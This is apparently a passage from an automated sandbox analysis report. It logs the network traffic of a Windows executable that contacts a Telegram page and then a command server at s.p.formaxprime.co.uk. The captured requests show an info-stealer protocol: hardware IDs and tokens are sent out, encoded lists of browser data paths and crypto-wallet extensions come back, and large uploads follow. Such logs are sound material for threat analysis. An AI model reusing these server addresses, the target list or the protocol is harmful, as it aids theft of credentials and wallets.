                                                                                            Mar 13, 2025 14:50:12.329891920 CET53512751.1.1.1192.168.2.4
                                                                                            Mar 13, 2025 14:50:15.357250929 CET5912553192.168.2.41.1.1.1
                                                                                            Mar 13, 2025 14:50:15.357413054 CET6417153192.168.2.41.1.1.1
                                                                                            Mar 13, 2025 14:50:15.361535072 CET53650381.1.1.1192.168.2.4
                                                                                            Mar 13, 2025 14:50:15.364224911 CET53591251.1.1.1192.168.2.4
                                                                                            Mar 13, 2025 14:50:15.364236116 CET53641711.1.1.1192.168.2.4
                                                                                            Mar 13, 2025 14:50:53.513468981 CET138138192.168.2.4192.168.2.255

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Mar 13, 2025 14:49:44.750199080 CET192.168.2.41.1.1.10x1e2dStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                            Mar 13, 2025 14:49:47.171947002 CET192.168.2.41.1.1.10xf52eStandard query (0)s.p.formaxprime.co.ukA (IP address)IN (0x0001)false
                                                                                            Mar 13, 2025 14:50:08.918514013 CET192.168.2.41.1.1.10x7c41Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                            Mar 13, 2025 14:50:08.918663979 CET192.168.2.41.1.1.10x164dStandard query (0)www.google.com65IN (0x0001)false
                                                                                            Mar 13, 2025 14:50:15.357250929 CET192.168.2.41.1.1.10x9980Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                            Mar 13, 2025 14:50:15.357413054 CET192.168.2.41.1.1.10x36cbStandard query (0)apis.google.com65IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Mar 13, 2025 14:49:44.757081985 CET1.1.1.1192.168.2.40x1e2dNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                            Mar 13, 2025 14:49:47.185832977 CET1.1.1.1192.168.2.40xf52eNo error (0)s.p.formaxprime.co.uk78.47.63.132A (IP address)IN (0x0001)false
                                                                                            Mar 13, 2025 14:50:08.925170898 CET1.1.1.1192.168.2.40x7c41No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                                                                                            Mar 13, 2025 14:50:08.925215960 CET1.1.1.1192.168.2.40x164dNo error (0)www.google.com65IN (0x0001)false
                                                                                            Mar 13, 2025 14:50:15.364224911 CET1.1.1.1192.168.2.40x9980No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Mar 13, 2025 14:50:15.364224911 CET1.1.1.1192.168.2.40x9980No error (0)plus.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                            Mar 13, 2025 14:50:15.364236116 CET1.1.1.1192.168.2.40x36cbNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • t.me
                                                                                            • s.p.formaxprime.co.uk
                                                                                            • www.google.com

                                                                                            HTTPS Connections

                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                            Mar 13, 2025 14:50:36.853621960 CET78.47.63.132443192.168.2.449771CN=s.p.formaxprime.co.uk CN=E5, O=Let's Encrypt, C=USCN=E5, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USThu Mar 13 12:01:25 CET 2025 Wed Mar 13 01:00:00 CET 2024Wed Jun 11 13:01:24 CEST 2025 Sat Mar 13 00:59:59 CET 2027771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                            CN=E5, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027

                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449719149.154.167.994437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:49:46 UTC90OUTGET /g_etcontent HTTP/1.1
                                                                                            Host: t.me
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:49:46 UTC512INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Thu, 13 Mar 2025 13:49:46 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Content-Length: 12415
                                                                                            Connection: close
                                                                                            Set-Cookie: stel_ssid=6d5d8de6cb2fbf37fe_14734770428889512093; expires=Fri, 14 Mar 2025 13:49:46 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                            Pragma: no-cache
                                                                                            Cache-control: no-store
                                                                                            X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                            Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                            Strict-Transport-Security: max-age=35768000
                                                                                            2025-03-13 13:49:46 UTC12415INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 67 5f 65 74 63 6f 6e 74 65 6e 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70
                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @g_etcontent</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.p


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.44972078.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:49:49 UTC179OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:49:49 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:49:49 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:49:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.44972378.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:49:51 UTC271OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----jwl6xbi589zcbasrq9hl
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 255
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:49:51 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 6a 77 6c 36 78 62 69 35 38 39 7a 63 62 61 73 72 71 39 68 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 38 38 45 42 41 41 34 46 42 42 42 38 38 33 38 38 34 31 37 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 6a 77 6c 36 78 62 69 35 38 39 7a 63 62 61 73 72 71 39 68 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 6a 77 6c 36 78 62 69 35 38 39 7a 63 62 61 73 72 71 39 68 6c 2d 2d 0d 0a
                                                                                            Data Ascii: ------jwl6xbi589zcbasrq9hlContent-Disposition: form-data; name="hwid"788EBAA4FBBB883884179-a33c7340-61ca------jwl6xbi589zcbasrq9hlContent-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------jwl6xbi589zcbasrq9hl--
                                                                                            2025-03-13 13:49:52 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:49:52 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:49:52 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 3a1|1|1|1|62ea7d46d032f863664b8276fed29d8f|1|1|1|0|0|50000|10


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.44972578.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:49:53 UTC271OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----00hdtj58q9rieusr1vai
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 331
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:49:53 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 30 30 68 64 74 6a 35 38 71 39 72 69 65 75 73 72 31 76 61 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 30 30 68 64 74 6a 35 38 71 39 72 69 65 75 73 72 31 76 61 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 30 30 68 64 74 6a 35 38 71 39 72 69 65 75 73 72 31 76 61 69 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------00hdtj58q9rieusr1vaiContent-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------00hdtj58q9rieusr1vaiContent-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------00hdtj58q9rieusr1vaiCont
                                                                                            2025-03-13 13:49:54 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:49:54 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:49:54 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                            Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.44972878.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:49:56 UTC271OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----noh47g4eusr1vaa1nozc
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 331
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:49:56 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 6e 6f 68 34 37 67 34 65 75 73 72 31 76 61 61 31 6e 6f 7a 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 6e 6f 68 34 37 67 34 65 75 73 72 31 76 61 61 31 6e 6f 7a 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 6e 6f 68 34 37 67 34 65 75 73 72 31 76 61 61 31 6e 6f 7a 63 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------noh47g4eusr1vaa1nozcContent-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------noh47g4eusr1vaa1nozcContent-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------noh47g4eusr1vaa1nozcCont
                                                                                            2025-03-13 13:49:57 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:49:57 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:49:57 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                            Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.44972978.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:49:58 UTC271OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----ophdt0hdjmyuaiwtje3w
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 332
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:49:58 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 6f 70 68 64 74 30 68 64 6a 6d 79 75 61 69 77 74 6a 65 33 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 6f 70 68 64 74 30 68 64 6a 6d 79 75 61 69 77 74 6a 65 33 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 6f 70 68 64 74 30 68 64 6a 6d 79 75 61 69 77 74 6a 65 33 77 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------ophdt0hdjmyuaiwtje3wContent-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------ophdt0hdjmyuaiwtje3wContent-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------ophdt0hdjmyuaiwtje3wCont
                                                                                            2025-03-13 13:49:59 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:49:59 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:49:59 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.44973278.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:01 UTC272OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----5f3oph4wb1dbaas00zcb
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 5473
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:01 UTC5473OUTData Raw: 2d 2d 2d 2d 2d 2d 35 66 33 6f 70 68 34 77 62 31 64 62 61 61 73 30 30 7a 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 35 66 33 6f 70 68 34 77 62 31 64 62 61 61 73 30 30 7a 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 35 66 33 6f 70 68 34 77 62 31 64 62 61 61 73 30 30 7a 63 62 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------5f3oph4wb1dbaas00zcbContent-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------5f3oph4wb1dbaas00zcbContent-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------5f3oph4wb1dbaas00zcbCont
                                                                                            2025-03-13 13:50:02 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:50:02 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 2ok0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.44973378.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:02 UTC271OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----s0zm7q9000r9zuk6p89z
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 489
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:02 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 73 30 7a 6d 37 71 39 30 30 30 72 39 7a 75 6b 36 70 38 39 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 73 30 7a 6d 37 71 39 30 30 30 72 39 7a 75 6b 36 70 38 39 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 73 30 7a 6d 37 71 39 30 30 30 72 39 7a 75 6b 36 70 38 39 7a 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------s0zm7q9000r9zuk6p89zContent-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------s0zm7q9000r9zuk6p89zContent-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------s0zm7q9000r9zuk6p89zCont
                                                                                            2025-03-13 13:50:03 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:50:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 2ok0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.44973478.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:03 UTC274OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----uaiwlfus2nohvas26fu3
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 262605
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:03 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 75 61 69 77 6c 66 75 73 32 6e 6f 68 76 61 73 32 36 66 75 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 75 61 69 77 6c 66 75 73 32 6e 6f 68 76 61 73 32 36 66 75 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 75 61 69 77 6c 66 75 73 32 6e 6f 68 76 61 73 32 36 66 75 33 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------uaiwlfus2nohvas26fu3Content-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------uaiwlfus2nohvas26fu3Content-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------uaiwlfus2nohvas26fu3Cont
